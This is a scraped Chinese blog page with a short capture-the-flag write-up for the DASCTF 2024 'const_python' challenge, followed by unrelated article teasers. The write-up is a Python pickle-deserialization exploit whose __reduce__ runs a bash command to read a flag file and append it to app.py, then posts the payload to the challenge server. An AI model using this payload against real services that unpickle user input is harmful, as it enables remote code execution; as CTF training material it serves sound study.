news 2026/6/6 20:58:41

[DASCTF 2024最后一战|寒夜破晓,冬至终章]const_python

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[DASCTF 2024最后一战|寒夜破晓,冬至终章]const_python

[DASCTF 2024最后一战|寒夜破晓,冬至终章]const_python

import pickle import subprocess import base64 import requests import re class EvilObject: def __reduce__(self): # 使用 subprocess.run 执行 "dir" 命令。 # 通过命令行将 flag 文件内容追加到 app.py 末尾。tee 命令的 -a 参数表示追加(类似 >>,直接操作文件: return (subprocess.run, (["bash","-c","cat ../../../flag | tee -a app.py" ],),{"shell": True}) # 创建恶意对象 evil_object = EvilObject() # 序列化恶意对象 pickled_data = pickle.dumps(evil_object) # base64 编码序列化对象 pickled_data_base64 = base64.b64encode(pickled_data).decode('utf-8') # 输出序列化后的 Base64 编码 print("Base64 Encoded Pickled Data:") print(pickled_data_base64) //这是重点,记得替换 //这是重点,记得替换 //这是重点,记得替换 //这是重点,记得替换 url = 'http://f7eeb85c-cbe6-43a3-ad8c-25cc55bd5a1f.node5.buuoj.cn:81/ppicklee' # 要发送的POST数据,通常是字典格式 data = {'data': pickled_data_base64} # 发送POST请求 response = requests.post(url, data=data) # 打印响应的状态码和内容 print('Status Code:', response.status_code) print('Response Text:', response.text)

运行后访问http://xxxxxx/src 查看源代码,最下面有flag

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/6 20:58:09

Xmind 2025安装教程

文章目录XMind下载XMind安装教程今天我就为大家带来XMind 2025版本的详细安装教程,即使你是电脑小白,按照下面的步骤操作,也能轻松完成XMind的安装过程。 XMind下载 将👇内容复制到浏览器地址栏即可获取 %70%61%6E%2E%71%75%61%7…

作者头像 李华
网站建设 2026/6/6 20:56:40

免费解锁9大网盘高速下载:LinkSwift直链助手终极指南

免费解锁9大网盘高速下载:LinkSwift直链助手终极指南 【免费下载链接】Online-disk-direct-link-download-assistant 一个基于 JavaScript 的网盘文件下载地址获取工具。基于【网盘直链下载助手】修改 ,支持 百度网盘 / 阿里云盘 / 中国移动云盘 / 天翼云…

作者头像 李华
网站建设 2026/6/6 20:55:16

饿肚子能瘦?其实你在掉的不是脂肪,是代谢

饿肚子能瘦?其实你在掉的不是脂肪,是代谢起因 今天食欲不太好,下班后在想:要不要吃晚饭? 然后脑子里突然冒出一个问题:饿肚子真的能瘦吗? 以前高中老师说:先消耗糖,再消耗…

作者头像 李华
网站建设 2026/6/6 20:48:49

2026年实测4款听书软件,我找到了碎片时间最聪明的用法

说实话,现在谁还有大块时间安安静静翻书?通勤地铁上、做饭洗碗时、睡前躺平那十几分钟——这些零碎时间加一起,每天少说也有两三个小时。听书早就成了主流,耳朵一戴,干活、赶路不耽误,脑子还能跟着内容走。…

作者头像 李华
网站建设 2026/6/6 20:48:03

邪修C语言之指针与数组

C语言之指针与数组 数组与内存 数组指针 数组指针与普通指针对比 能否被=号赋值 数组指针之间与指针的等效关系 如何邪修理解记忆 指针,数组指针与sizeof sizeof sizeof计算数组指针和数组 sizeof与数组指针的注意事项 数组与内存 数组是一组相同类型的元素的集合,这些元素在…

作者头像 李华
网站建设 2026/6/6 20:48:02

微软AutoGen全解:多AI智能体组队干活,零基础快速上手实战

文章目录前言一、AutoGen到底是啥?二、为什么选AutoGen?三、AutoGen的"员工名单"Agent——你的员工Conversation——员工对话Message——一句话Tool——工具箱Team——项目组GroupChat——微信群四、消息是怎么流转的?五、快速上手…

作者头像 李华